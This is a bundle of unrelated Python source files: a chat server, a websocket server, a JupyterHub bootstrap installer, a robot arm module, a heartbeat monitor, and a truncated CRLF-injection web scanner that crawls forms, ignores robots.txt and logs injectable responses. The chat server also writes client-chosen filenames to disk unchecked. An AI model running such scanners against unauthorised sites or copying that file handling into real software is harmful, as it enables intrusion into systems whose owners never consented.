usernameToApprove = client.recv(1024).decode("utf-8")
if usernameToApprove in groups[groupname].joinRequests:
groups[groupname].joinRequests.remove(usernameToApprove)
groups[groupname].allMembers.add(usernameToApprove)
if usernameToApprove in groups[groupname].waitClients:
groups[groupname].waitClients[usernameToApprove].send(b"/accepted")
groups[groupname].connect(usernameToApprove,groups[groupname].waitClients[usernameToApprove])
del groups[groupname].waitClients[usernameToApprove]
print("Member Approved:",usernameToApprove,"| Group:",groupname)
client.send(b"User has been added to the group.")
else:
client.send(b"The user has not requested to join.")
else:
client.send(b"You're not an admin.")
elif msg == "/disconnect":
client.send(b"/disconnect")
client.recv(1024).decode("utf-8")
groups[groupname].disconnect(username)
print("User Disconnected:",username,"| Group:",groupname)
break
elif msg == "/messageSend":
client.send(b"/messageSend")
message = client.recv(1024).decode("utf-8")
groups[groupname].sendMessage(message,username)
elif msg == "/waitDisconnect":
client.send(b"/waitDisconnect")
del groups[groupname].waitClients[username]
print("Waiting Client:",username,"Disconnected")
break
elif msg == "/allMembers":
client.send(b"/allMembers")
client.recv(1024).decode("utf-8")
client.send(pickle.dumps(groups[groupname].allMembers))
elif msg == "/onlineMembers":
client.send(b"/onlineMembers")
client.recv(1024).decode("utf-8")
client.send(pickle.dumps(groups[groupname].onlineMembers))
elif msg == "/changeAdmin":
client.send(b"/changeAdmin")
client.recv(1024).decode("utf-8")
if username == groups[groupname].admin:
client.send(b"/proceed")
newAdminUsername = client.recv(1024).decode("utf-8")
if newAdminUsername in groups[groupname].allMembers:
groups[groupname].admin = newAdminUsername
print("New Admin:",newAdminUsername,"| Group:",groupname)
client.send(b"Your adminship is now transferred to the specified user.")
else:
client.send(b"The user is not a member of this group.")
else:
client.send(b"You're not an admin.")
elif msg == "/whoAdmin":
client.send(b"/whoAdmin")
groupname = client.recv(1024).decode("utf-8")
client.send(bytes("Admin: "+groups[groupname].admin,"utf-8"))
elif msg == "/kickMember":
client.send(b"/kickMember")
client.recv(1024).decode("utf-8")
if username == groups[groupname].admin:
client.send(b"/proceed")
usernameToKick = client.recv(1024).decode("utf-8")
if usernameToKick in groups[groupname].allMembers:
groups[groupname].allMembers.remove(usernameToKick)
if usernameToKick in groups[groupname].onlineMembers:
groups[groupname].clients[usernameToKick].send(b"/kicked")
groups[groupname].onlineMembers.remove(usernameToKick)
del groups[groupname].clients[usernameToKick]
print("User Removed:",usernameToKick,"| Group:",groupname)
client.send(b"The specified user is removed from the group.")
else:
client.send(b"The user is not a member of this group.")
else:
client.send(b"You're not an admin.")
elif msg == "/fileTransfer":
client.send(b"/fileTransfer")
filename = client.recv(1024).decode("utf-8")
if filename == "~error~":
continue
client.send(b"/sendFile")
remaining = int.from_bytes(client.recv(4),'big')
f = open(filename,"wb")
while remaining:
data = client.recv(min(remaining,4096))
remaining -= len(data)
f.write(data)
f.close()
print("File received:",filename,"| User:",username,"| Group:",groupname)
for member in groups[groupname].onlineMembers:
if member != username:
memberClient = groups[groupname].clients[member]
memberClient.send(b"/receiveFile")
with fileTransferCondition:
fileTransferCondition.wait()
memberClient.send(bytes(filename,"utf-8"))
with fileTransferCondition:
fileTransferCondition.wait()
with open(filename,'rb') as f:
data = f.read()
dataLen = len(data)
memberClient.send(dataLen.to_bytes(4,'big'))
memberClient.send(data)
client.send(bytes(filename+" successfully sent to all online group members.","utf-8"))
print("File sent",filename,"| Group: ",groupname)
os.remove(filename)
elif msg == "/sendFilename" or msg == "/sendFile":
with fileTransferCondition:
fileTransferCondition.notify()
else:
print("UNIDENTIFIED COMMAND:",msg)
def handshake(client):
username = client.recv(1024).decode("utf-8")
client.send(b"/sendGroupname")
groupname = client.recv(1024).decode("utf-8")
if groupname in groups:
if username in groups[groupname].allMembers:
groups[groupname].connect(username,client)
client.send(b"/ready")
print("User Connected:",username,"| Group:",groupname)
else:
groups[groupname].joinRequests.add(username)
groups[groupname].waitClients[username] = client
groups[groupname].sendMessage(username+" has requested to join the group.","PyconChat")
client.send(b"/wait")
print("Join Request:",username,"| Group:",groupname)
threading.Thread(target=pyconChat, args=(client, username, groupname,)).start()
else:
groups[groupname] = Group(username,client)
threading.Thread(target=pyconChat, args=(client, username, groupname,)).start()
client.send(b"/adminReady")
print("New Group:",groupname,"| Admin:",username)
def main():
if len(sys.argv) < 3:
print("USAGE: python server.py <IP> <Port>")
print("EXAMPLE: python server.py localhost 8000")
return
listenSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listenSocket.bind((sys.argv[1], int(sys.argv[2])))
listenSocket.listen(10)
print("PyconChat Server running")
while True:
client,_ = listenSocket.accept()
threading.Thread(target=handshake, args=(client,)).start()
if __name__ == "__main__":
main()
|
sockServer.py
|
import asyncio
import websockets
import json
import threading
from protocol import field, action, motor, power
class sockServer:
'''Starts websocket server, listens for connections, and facilitates automatic reading and writeng from connetions
Args:
receiveEvent (function(str)): called when message is received and passed message
port (int): TCP port to open socket on
'''
def __init__(self, port, receiveEvent = None):
self.port = port
self.recEvent = receiveEvent
self.users = []
loop = None
recT = threading.Thread(target = self.start, args=[port])
recT.start()
def start(self, port):
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
try:
coro = websockets.server.serve(self.handle_conn, host='', port=port, loop=self.loop)
server = self.loop.run_until_complete(coro)
except OSError:
print("Socket OSError, closeing")
else:
self.loop.run_forever()
server.close()
self.loop.run_until_complete(server.wait_closed())
self.loop.close()
def send(self, data):
message = json.dumps(data)
for user in self.users:
asyncio.run_coroutine_threadsafe(user.send(message), self.loop)
async def handle_conn(self, conn, Uri):
print("URI: " + Uri)
user = client(conn, self.recEvent, self)
self.users.append(user)
await user.beginReceiveLoop()
class client:
def __init__(self, conn, recEvent, sockServ):
self.conn = conn
self.alive = True
self.recEvent = recEvent
self.sockServ = sockServ
async def beginReceiveLoop(self):
while self.alive:
try:
message = await self.conn.recv()
except websockets.exceptions.ConnectionClosed as e:
self.destory()
break
if message != "":
try:
data = json.loads(message)
self.recEvent(data)
except ValueError as e:
print("JSON LOAD ERROR: " + e)
async def send(self, data):
try:
print("Socket Send: " + data)
await self.conn.send(data)
except websockets.exceptions.ConnectionClosed as e:
print(e)
self.destory()
def destory(self):
self.alive = False
self.sockServ.users.remove(self)
self.conn.close()
|
bootstrap.py
|
"""
Bootstrap an installation of TLJH.
Sets up just enough TLJH environments to invoke tljh.installer.
This script is run as:
curl <script-url> | sudo python3 -
Constraints:
- Entire script should be compatible with Python 3.6 (We run on Ubuntu 18.04+)
- Script should parse in Python 3.4 (since we exit with useful error message on Ubuntu 14.04+)
- Use stdlib modules only
"""
import os
from http.server import SimpleHTTPRequestHandler, HTTPServer
import multiprocessing
import subprocess
import sys
import logging
import shutil
import urllib.request
html = """
<html>
<head>
<title>The Littlest Jupyterhub</title>
</head>
<body>
<meta http-equiv="refresh" content="30" >
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta name="viewport" content="width=device-width">
<img class="logo" src="https://raw.githubusercontent.com/jupyterhub/the-littlest-jupyterhub/master/docs/images/logo/logo.png">
<div class="loader center"></div>
<div class="center main-msg">Please wait while your TLJH is building...</div>
<div class="center logs-msg">Click the button below to see the logs</div>
<div class="center tip" >Tip: to update the logs, refresh the page</div>
<button class="logs-button center" onclick="window.location.href='/logs'">View logs</button>
</body>
<style>
button:hover {
background: grey;
}
.logo {
width: 150px;
height: auto;
}
.center {
margin: 0 auto;
margin-top: 50px;
text-align:center;
display: block;
}
.main-msg {
font-size: 30px;
font-weight: bold;
color: grey;
text-align:center;
}
.logs-msg {
font-size: 15px;
color: grey;
}
.tip {
font-size: 13px;
color: grey;
margin-top: 10px;
font-style: italic;
}
.logs-button {
margin-top:15px;
border: 0;
color: white;
padding: 15px 32px;
font-size: 16px;
cursor: pointer;
background: #f5a252;
}
.loader {
width: 150px;
height: 150px;
border-radius: 90%;
border: 7px solid transparent;
animation: spin 2s infinite ease;
animation-direction: alternate;
}
@keyframes spin {
0% {
transform: rotateZ(0deg);
border-top-color: #f17c0e
}
100% {
transform: rotateZ(360deg);
border-top-color: #fce5cf;
}
}
</style>
</head>
</html>
"""
logger = logging.getLogger(__name__)
def get_os_release_variable(key):
"""
Return value for key from /etc/os-release
/etc/os-release is a bash file, so should use bash to parse it.
Returns empty string if key is not found.
"""
return subprocess.check_output([
'/bin/bash', '-c',
"source /etc/os-release && echo ${{{key}}}".format(key=key)
]).decode().strip()
# Copied into tljh/utils.py. Make sure the copies are exactly the same!
def run_subprocess(cmd, *args, **kwargs):
"""
Run given cmd with smart output behavior.
If command succeeds, print output to debug logging.
If it fails, print output to info logging.
In TLJH, this sends successful output to the installer log,
and failed output directly to the user's screen
"""
logger = logging.getLogger('tljh')
proc = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, *args, **kwargs)
printable_command = ' '.join(cmd)
if proc.returncode != 0:
# Our process failed! Show output to the user
logger.error('Ran {command} with exit code {code}'.format(
command=printable_command, code=proc.returncode
))
logger.error(proc.stdout.decode())
raise subprocess.CalledProcessError(cmd=cmd, returncode=proc.returncode)
else:
# This goes into installer.log
logger.debug('Ran {command} with exit code {code}'.format(
command=printable_command, code=proc.returncode
))
# This produces multi line log output, unfortunately. Not sure how to fix.
# For now, prioritizing human readability over machine readability.
logger.debug(proc.stdout.decode())
def validate_host():
"""
Make sure TLJH is installable in current host
"""
# Support only Ubuntu 18.04+
distro = get_os_release_variable('ID')
version = float(get_os_release_variable('VERSION_ID'))
if distro != 'ubuntu':
print('The Littlest JupyterHub currently supports Ubuntu Linux only')
sys.exit(1)
elif float(version) < 18.04:
print('The Littlest JupyterHub requires Ubuntu 18.04 or higher')
sys.exit(1)
if sys.version_info < (3, 5):
print("bootstrap.py must be run with at least Python 3.5")
sys.exit(1)
if not (shutil.which('systemd') and shutil.which('systemctl')):
print("Systemd is required to run TLJH")
# Only fail running inside docker if systemd isn't present
if os.path.exists('/.dockerenv'):
print("Running inside a docker container without systemd isn't supported")
print("We recommend against running a production TLJH instance inside a docker container")
print("For local development, see http://tljh.jupyter.org/en/latest/contributing/dev-setup.html")
sys.exit(1)
class LoaderPageRequestHandler(SimpleHTTPRequestHandler):
def do_GET(self):
if self.path == "/logs":
with open("/opt/tljh/installer.log", "r") as log_file:
logs = log_file.read()
self.send_response(200)
self.send_header('Content-Type', 'text/plain; charset=utf-8')
self.end_headers()
self.wfile.write(logs.encode('utf-8'))
elif self.path == "/index.html":
self.path = "/var/run/index.html"
return SimpleHTTPRequestHandler.do_GET(self)
elif self.path == "/favicon.ico":
self.path = "/var/run/favicon.ico"
return SimpleHTTPRequestHandler.do_GET(self)
elif self.path == "/":
self.send_response(302)
self.send_header('Location','/index.html')
self.end_headers()
else:
SimpleHTTPRequestHandler.send_error(self, code=403)
def serve_forever(server):
try:
server.serve_forever()
except KeyboardInterrupt:
pass
def main():
flags = sys.argv[1:]
temp_page_flag = "--show-progress-page"
# Check for flag in the argv list. This doesn't use argparse
# because it's the only argument that's meant for the boostrap script.
# All the other flags will be passed to and parsed by the installer.
if temp_page_flag in flags:
with open("/var/run/index.html", "w+") as f:
f.write(html)
favicon_url="https://raw.githubusercontent.com/jupyterhub/jupyterhub/master/share/jupyterhub/static/favicon.ico"
urllib.request.urlretrieve(favicon_url, "/var/run/favicon.ico")
# If the bootstrap is run to upgrade TLJH, then this will raise an "Address already in use" error
try:
loading_page_server = HTTPServer(("", 80), LoaderPageRequestHandler)
p = multiprocessing.Process(target=serve_forever, args=(loading_page_server,))
# Serves the loading page until TLJH builds
p.start()
# Remove the flag from the args list, since it was only relevant to this script.
flags.remove("--show-progress-page")
# Pass the server's pid as a flag to the istaller
pid_flag = "--progress-page-server-pid"
flags.extend([pid_flag, str(p.pid)])
except OSError:
# Only serve the loading page when installing TLJH
pass
validate_host()
install_prefix = os.environ.get('TLJH_INSTALL_PREFIX', '/opt/tljh')
hub_prefix = os.path.join(install_prefix, 'hub')
# Set up logging to print to a file and to stderr
os.makedirs(install_prefix, exist_ok=True)
file_logger_path = os.path.join(install_prefix, 'installer.log')
file_logger = logging.FileHandler(file_logger_path)
# installer.log should be readable only by root
os.chmod(file_logger_path, 0o500)
file_logger.setFormatter(logging.Formatter('%(asctime)s %(message)s'))
file_logger.setLevel(logging.DEBUG)
logger.addHandler(file_logger)
stderr_logger = logging.StreamHandler()
stderr_logger.setFormatter(logging.Formatter('%(message)s'))
stderr_logger.setLevel(logging.INFO)
logger.addHandler(stderr_logger)
logger.setLevel(logging.DEBUG)
logger.info('Checking if TLJH is already installed...')
if os.path.exists(os.path.join(hub_prefix, 'bin', 'python3')):
logger.info('TLJH already installed, upgrading...')
initial_setup = False
else:
logger.info('Setting up hub environment')
initial_setup = True
# Install software-properties-common, so we can get add-apt-repository
# That helps us make sure the universe repository is enabled, since
# that's where the python3-pip package lives. In some very minimal base
# VM images, it looks like the universe repository is disabled by default,
# causing bootstrapping to fail.
run_subprocess(['apt-get', 'update', '--yes'])
run_subprocess(['apt-get', 'install', '--yes', 'software-properties-common'])
run_subprocess(['add-apt-repository', 'universe'])
run_subprocess(['apt-get', 'update', '--yes'])
run_subprocess(['apt-get', 'install', '--yes',
'python3',
'python3-venv',
'python3-pip',
'git'
])
logger.info('Installed python & virtual environment')
os.makedirs(hub_prefix, exist_ok=True)
run_subprocess(['python3', '-m', 'venv', hub_prefix])
logger.info('Set up hub virtual environment')
if initial_setup:
logger.info('Setting up TLJH installer...')
else:
logger.info('Upgrading TLJH installer...')
pip_flags = ['--upgrade']
if os.environ.get('TLJH_BOOTSTRAP_DEV', 'no') == 'yes':
pip_flags.append('--editable')
tljh_repo_path = os.environ.get(
'TLJH_BOOTSTRAP_PIP_SPEC',
'git+https://gitee.com/jiangroubao/the-littlest-jupyterhub.git'
)
# Upgrade pip
run_subprocess([
os.path.join(hub_prefix, 'bin', 'pip'),
'install',
'--upgrade',
'pip==20.0.*'
])
logger.info('Upgraded pip')
run_subprocess([
os.path.join(hub_prefix, 'bin', 'pip'),
'install'
] + pip_flags + [tljh_repo_path])
logger.info('Setup tljh package')
logger.info('Starting TLJH installer...')
os.execv(
os.path.join(hub_prefix, 'bin', 'python3'),
[
os.path.join(hub_prefix, 'bin', 'python3'),
'-m',
'tljh.installer',
] + flags
)
if __name__ == '__main__':
main()
|
arm.py
|
"""Arm part module.
Implements a Right and a Left Arm.
"""
import time
import numpy as np
from operator import attrgetter
from collections import OrderedDict
from threading import Thread, Event
from .hand import LeftEmptyHand, RightEmptyHand, LeftForceGripper, RightForceGripper, OrbitaWrist
from .part import ReachyPart
hands = {
'force_gripper': {'left': LeftForceGripper, 'right': RightForceGripper},
'orbita_wrist': {'left': OrbitaWrist, 'right': OrbitaWrist},
'empty_hand': {'left': LeftEmptyHand, 'right': RightEmptyHand},
}
class Arm(ReachyPart):
"""Arm abstraction class.
Args:
side (str): 'right' or 'left'
io (str): port name where the modules can be found
dxl_motors (dict): config of the dynamixel motors composing the arm
hand (str): name of the Hand to attach ('force_gripper', 'orbita_wrist' or it can be None if no hand are attached)
Provides high-level access to:
* ordered list of motors
* forward and inverse kinematics
"""
fans = {
'shoulder_fan': 'shoulder_pitch',
'elbow_fan': 'elbow_pitch',
}
lower_temp_threshold, upper_temp_threshold = 40, 45
def __init__(self, side, io, dxl_motors, hand):
"""Create a new Arm part."""
ReachyPart.__init__(self, name=f'{side}_arm', io=io)
self.side = side
dxl_motors = OrderedDict(dxl_motors)
self.attach_dxl_motors(dxl_motors)
if hand is not None and hand not in hands.keys():
raise ValueError(f'"hand" must be one of {list(hands.keys())} or None!')
if hand is not None:
hand_cls = hands[hand][side]
hand_part = hand_cls(root=self, io=io)
self.motors += hand_part.motors
self.hand = hand_part
for m, conf in hand_cls.dxl_motors.items():
dxl_motors[m] = conf
else:
self.hand = None
self.attach_kinematic_chain(dxl_motors)
self.fans = dict(Arm.fans)
if hand is not None:
self.fans.update(hand_cls.fans)
for name in self.fans.keys():
setattr(self, name, self.io.find_fan(name))
self._monitor_temp = Event()
self._monitor_temp_loop = None
self.enable_temperature_monitoring()
def teardown(self):
"""Clean up before closing."""
if self.hand is not None:
self.hand.teardown()
ReachyPart.teardown(self)
def __repr__(self):
"""Arm representation."""
return f'<{self.side.capitalize()}Arm "motors": {self.motors} "hand": {self.hand}>'
def forward_kinematics(self, joints_position, use_rad=False):
"""Compute the forward kinematics of the Arm.
Args:
joints_position (:py:class:`~numpy.ndarray`): angle joints configuration of the arm (in degrees by default)
use_rad (bool): whether or not to use radians for joints configuration
.. note:: the end effector will be the end of the Hand if one is attached.
"""
joints_position = np.array(joints_position)
if len(joints_position.shape) == 1:
joints_position = joints_position.reshape(1, -1)
if not use_rad:
joints_position = np.deg2rad(joints_position)
M = self.kin_chain.forward(joints_position)
if joints_position.shape[0] == 1:
M = M[0]
return M
def inverse_kinematics(self, target_pose, q0=None, use_rad=False, maxiter=10):
"""Approximate the inverse kinematics of the Arm.
Args:
target_pose (:py:class:`~numpy.ndarray`): 4x4 homogeneous pose of the target end effector pose
q0 (:py:class:`~numpy.ndarray`): joint initial angle configurations (used for bootstraping the optimization)
use_rad (bool): whether or not to use radians for joints configuration
maxiter (int): maximum number of iteration to run on the optimizer
.. note:: the end effector will be the end of the Hand if one is attached.
"""
if q0 is None:
q0 = [m.present_position for m in self.motors]
q0 = np.array(q0)
if len(q0.shape) == 1:
q0 = q0.reshape(1, -1)
if len(target_pose.shape) == 2:
target_pose = target_pose.reshape(-1, 4, 4)
if not use_rad:
q0 = np.deg2rad(q0)
J = self.kin_chain.inverse(target_pose, q0, maxiter=maxiter)
if J.shape[0] == 1:
J = J[0]
if not use_rad:
J = np.rad2deg(J)
return J
def enable_temperature_monitoring(self):
"""Enable the automatic motor cooling procedure.
The specified motors temperature will be watched and when they reached a specific threshold, the fan will automatically be turned on.
When the temperature goes below a lower threshold, they will turn off.
"""
if not self._monitor_temp.is_set():
self._monitor_temp.set()
self._monitor_temp_loop = Thread(target=self._temperature_monitoring)
self._monitor_temp_loop.daemon = True
self._monitor_temp_loop.start()
def disable_temperature_monitoring(self):
"""Disable the automatic motor cooling procedure."""
if self._monitor_temp.is_set():
self._monitor_temp.clear()
def _temperature_monitoring(self):
while self._monitor_temp.is_set():
for fan_name, motor_name in self.fans.items():
fan = attrgetter(fan_name)(self)
motor = attrgetter(motor_name)(self)
if motor.temperature is not None and motor.temperature >= self.upper_temp_threshold:
fan.on()
elif motor.temperature is not None and motor.temperature <= self.lower_temp_threshold:
fan.off()
time.sleep(30)
class LeftArm(Arm):
"""Left Arm part.
Args:
io (str): port name where the modules can be found
hand (str): name of the :py:class:`~reachy.parts.hand.Hand` to attach ('force_gripper', 'orbita_wrist' or it can be None if no hand are attached)
"""
dxl_motors = OrderedDict([
('shoulder_pitch', {
'id': 20, 'offset': 90.0, 'orientation': 'direct',
'angle-limits': [-60, 180],
'link-translation': [0, 0.19, 0], 'link-rotation': [0, 1, 0]
}),
('shoulder_roll', {
'id': 21, 'offset': -90.0, 'orientation': 'indirect',
'angle-limits': [-90, 100],
'link-translation': [0, 0, 0], 'link-rotation': [1, 0, 0],
}),
('arm_yaw', {
'id': 22, 'offset': 0.0, 'orientation': 'indirect',
'angle-limits': [-90, 90],
'link-translation': [0, 0, 0], 'link-rotation': [0, 0, 1],
}),
('elbow_pitch', {
'id': 23, 'offset': 0.0, 'orientation': 'indirect',
'angle-limits': [0, 125],
'link-translation': [0, 0, -0.28], 'link-rotation': [0, 1, 0],
}),
])
def __init__(self, io, hand=None):
"""Create a new Left Arm part."""
Arm.__init__(self, side='left',
io=io, dxl_motors=LeftArm.dxl_motors,
hand=hand)
class RightArm(Arm):
"""Right Arm part.
Args:
io (str): port name where the modules can be found
hand (str): name of the :py:class:`~reachy.parts.hand.Hand` to attach ('force_gripper', 'orbita_wrist' or it can be None if no hand are attached)
"""
"""
('shoulder_pitch', {
'id': 10, 'offset': 90.0, 'orientation': 'indirect',
'angle-limits': [-180, 60],
'link-translation': [0, -0.19, 0], 'link-rotation': [0, 1, 0],
}),
('shoulder_roll', {
'id': 11, 'offset': 90.0, 'orientation': 'indirect',
'angle-limits': [-100, 90],
'link-translation': [0, 0, 0], 'link-rotation': [1, 0, 0],
}),
('arm_yaw', {
'id': 12, 'offset': 0.0, 'orientation': 'indirect',
'angle-limits': [-90, 90],
'link-translation': [0, 0, 0], 'link-rotation': [0, 0, 1],
}),
('elbow_pitch', {
'id': 13, 'offset': 0.0, 'orientation': 'indirect',
'angle-limits': [0, 125],
'link-translation': [0, 0, -0.28], 'link-rotation': [0, 1, 0],
}),
"""
dxl_motors = OrderedDict([
('shoulder_pitch', {
# OK
'id': 10, 'offset': -90.0, 'orientation': 'indirect',
'angle-limits': [-180, 60],
'link-translation': [0, -0.19, 0], 'link-rotation': [0, 1, 0],
}),
('shoulder_roll', {
# TODO: still need to fix offset
'id': 11, 'offset': 0, 'orientation': 'indirect',
'angle-limits': [-180, 10],
'link-translation': [0, 0, 0], 'link-rotation': [1, 0, 0],
}),
('arm_yaw', {
# OK
'id': 12, 'offset': 5.0, 'orientation': 'indirect',
'angle-limits': [-90, 90],
'link-translation': [0, 0, 0], 'link-rotation': [0, 0, 1],
}),
('elbow_pitch', {
# OK
'id': 13, 'offset': 45.0, 'orientation': 'indirect',
'angle-limits': [-125, 0],
'link-translation': [0, 0, -0.28], 'link-rotation': [0, 1, 0],
}),
])
def __init__(self, io, hand=None):
"""Create a new Right Arm part."""
Arm.__init__(self, side='right',
io=io, dxl_motors=RightArm.dxl_motors,
hand=hand)
|
heartbeat.py
|
import os
import time
import pprint
import signal
import threading as mt
from .misc import as_list
from .logger import Logger
# ------------------------------------------------------------------------------
#
class Heartbeat(object):
# --------------------------------------------------------------------------
#
def __init__(self, uid, timeout, interval=1, beat_cb=None, term_cb=None,
log=None):
'''
This is a simple hearteat monitor: after construction, it's `beat()`
method needs to be called in intervals shorter than the given `timeout`
value. A thread will be created which checks if heartbeats arrive
timely - if not, the current process is killed via `os.kill()` (but see
below).
If a callback `beat_cb` is specified, the watcher will also invoke that
callback after every `interval` seconds. This can be used to ensure
heartbeats by the owning instance (which may feed this or any other
`Heartbeat` monitor instance). The `term_cb` callback is invoked on
heartbeat failure, i.e., just before the process would be killed, and
gets a single argument, the uid of the failing heartbeat sender. If
that term callback returns `True`, the kill is avoided though: timers
are reset and everything continues like before. This should be used to
recover from failing components.
When timeout is set to `None`, no trigger action on missing heartbeats
will ever be triggered.
'''
# we should not need to lock timestamps, in the current CPython
# implementation, dict access is assumed to be atomic. But heartbeats
# should not be in the performance critical path, and should not have
# threads competing with the (private) dict lock, so we accept the
# overhead.
if timeout and interval > timeout:
raise ValueError('timeout [%.1f] too small [>%.1f]'
% (timeout, interval))
self._uid = uid
self._log = log
self._timeout = timeout
self._interval = interval
self._beat_cb = beat_cb
self._term_cb = term_cb
self._term = mt.Event()
self._lock = mt.Lock()
self._tstamps = dict()
self._pid = os.getpid()
self._watcher = None
if not self._log:
self._log = Logger('radical.utils.heartbeat')
# --------------------------------------------------------------------------
#
def start(self):
self._log.debug('start heartbeat')
self._watcher = mt.Thread(target=self._watch)
self._watcher.daemon = True
self._watcher.start()
# --------------------------------------------------------------------------
#
def stop(self):
self._term.set()
# # no need to join, is a daemon thread
# self._watcher.join()
# --------------------------------------------------------------------------
#
@property
def uid(self):
return self._uid
# --------------------------------------------------------------------------
#
def dump(self, log):
if not log: log = self._log
log.debug('hb dump %s: \n%s', self._uid, pprint.pformat(self._tstamps))
# --------------------------------------------------------------------------
#
def _watch(self):
# initial heartbeat without delay
if self._beat_cb:
self._beat_cb()
while not self._term.is_set():
time.sleep(self._interval)
now = time.time()
if self._beat_cb:
self._beat_cb()
# avoid iteration over changing dict
with self._lock:
uids = list(self._tstamps.keys())
for uid in uids:
# self._log.debug('hb %s check %s', self._uid, uid)
with self._lock:
last = self._tstamps.get(uid)
if last is None:
self._log.warn('hb %s[%s]: never seen', self._uid, uid)
continue
if now - last > self._timeout:
if self._log:
self._log.warn('hb %s[%s]: %.1f - %.1f > %1.f: timeout',
self._uid, uid, now, last, self._timeout)
ret = None
if self._timeout:
# attempt to recover
if self._term_cb:
ret = self._term_cb(uid)
else:
# we silently assume that the watchee recovered, thus
# avoiding termination
ret = True
if ret is None:
# could not recover: abandon mothership
self._log.warn('hb fail %s: fatal (%d)', uid, self._pid)
os.kill(self._pid, signal.SIGTERM)
time.sleep(1)
os.kill(self._pid, signal.SIGKILL)
else:
# recovered - the failed UID was replaced with the one
# returned by the callback. We delete the heartbeat
# information for the old uid and register a new
# heartbeat for the new one, so that we can immediately
# begin to watch it.
self._log.info('hb recover %s -> %s (%s)',
uid, ret, self._term_cb)
with self._lock:
del(self._tstamps[uid])
self._tstamps[ret] = time.time()
# --------------------------------------------------------------------------
#
def beat(self, uid=None, timestamp=None):
if not timestamp:
timestamp = time.time()
if not uid:
uid = 'default'
# self._log.debug('hb %s beat [%s]', self._uid, uid)
with self._lock:
self._tstamps[uid] = timestamp
# # --------------------------------------------------------------------------
# #
# def is_alive(self, uid=None):
# '''
# Check if an entity of the given UID sent a recent heartbeat
# '''
#
# if not uid:
# uid = 'default'
#
# with self._lock:
# ts = self._tstamps.get(uid)
#
# if ts and time.time() - ts <= self._timeout:
# return True
#
# return False
# --------------------------------------------------------------------------
#
def wait_startup(self, uids=None, timeout=None):
'''
Wait for the first heartbeat of the given UIDs to appear. This returns
the list of UIDs which have *not* been found, or `None` otherwise.
'''
if not uids:
uids = ['default']
uids = as_list(uids)
start = time.time()
ok = list()
while True:
with self._lock:
ok = [uid for uid in uids if self._tstamps.get(uid)]
nok = [uid for uid in uids if uid not in ok]
self._log.debug('wait for : %s', nok)
if len(ok) == len(uids):
break
if timeout:
if time.time() - start > timeout:
self._log.debug('wait time: %s', nok)
break
time.sleep(0.05)
if len(ok) != len(uids):
nok = [uid for uid in uids if uid not in ok]
self._log.debug('wait fail: %s', nok)
return nok
else:
self._log.debug('wait ok : %s', ok)
# ------------------------------------------------------------------------------
|
crlf_injection_v1.py
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import mechanize
import requests
import random
import sys
from urlparse import urlparse
from urlparse import parse_qs
from urlparse import urlunsplit
import timeit
import argparse
import os
import multiprocessing as mp
import time
from pymongo import MongoClient
connection = MongoClient()
db = connection.crwaler # database name
user_agents = ["Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36", \
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1664.3 Safari/537.36", \
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.16 Safari/537.36", \
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2", \
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0", \
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0", \
"Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))", \
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 7.1; Trident/5.0)"
]
def dictToQuery(d):
query = ""
for key in d.keys():
query += str(key) + "=" + str(d[key]) + "&"
return query[:-1]
# make parameters from html form
def make_parameters(url):
br = mechanize.Browser()
if cookie is None:
br.addheaders = [('User-agent', random.choice(user_agents))]
else:
br.addheaders = [('User-agent', random.choice(user_agents)),\
("Cookie", cookie)]
br.set_handle_equiv(True)
br.set_handle_referer(True)
br.set_handle_robots(False)
try:
br.open(url)
except Exception as e:
return False
method = ""
action = ""
result = []
try:
forms = [f for f in br.forms()]
except Exception as e:
return False
if forms == []:
return False
for form in forms:
try:
method = form.method
except:
method = "GET"
try:
action = form.action
except Exception as e:
print e
payloads = {}
method = form.method
action = form.action
value_number = len(form.controls)
for value in range(value_number):
try:
name = str(form.controls[value].name)
except:
name = ""
try:
value = str(form.controls[value].value)
except:
value = ""
payloads[name] = value
result.append([payloads, method, action])
return result
def save_data(method, case, url, payloads, res):
headers = res.headers
for header in headers.keys():
report_collection = db["report"]
# crlf in header value
if (header.find("injected") != -1) or (headers[header].find("injected") != -1):
# if header.find("injected"):
# case2 and post
if payloads:
report_collection.insert({"url" : url,
"attack name" : "crlf injection",
"method" : method,
"case" : case,
"payload" : payloads,
"res_code" : res.status_code,
"res_length" : len(str(res.content)),
"res_headers" : str(res.headers)
# "res_content" : res.content,
# "res_time" : res.elapsed.total_seconds()
})
print "[+] [%s] %s" %(case, url)
# case1 and get, case2 and get
else:
report_collection.insert({"url" : url,
"attack name" : "crlf injection",
"method" : method,
"case" : case,
"payload" : res.url,
"res_code" : res.status_code,
"res_length" : len(str(res.content)),
"res_headers" : str(res.headers)
# "res_content" : res.content,
# "res_time" : res.elapsed.total_seconds()
})
print "[+] [%s] %s" %(case, url)
def web_request(payloads, method, action, case):
url_scheme = urlparse(action)[0]
url_location = urlparse(action)[1]
action = urlunsplit((url_scheme, url_location, "", "", ""))
if method == "GET" and case == "case1":
try:
if cookie is None:
try:
res = requests.get(action, timeout = 1, \
headers = {"User-Agent" : random.choice(user_agents)},\
verify = False,\
params = payloads)
save_data(method, case, str(url_location), None, res)
except (KeyboardInterrupt, SystemExit):
connection.close()
sys.exit(0)
except Exception as e:
pass
else:
pass
else:
try:
res = requests.get(action, timeout = 1,\
headers = {"User-Agent" : random.choice(user_agents),\
"Cookie" : cookie},\
verify = False,\
params = payloads)
save_data(method, case, str(url_location), None, res)
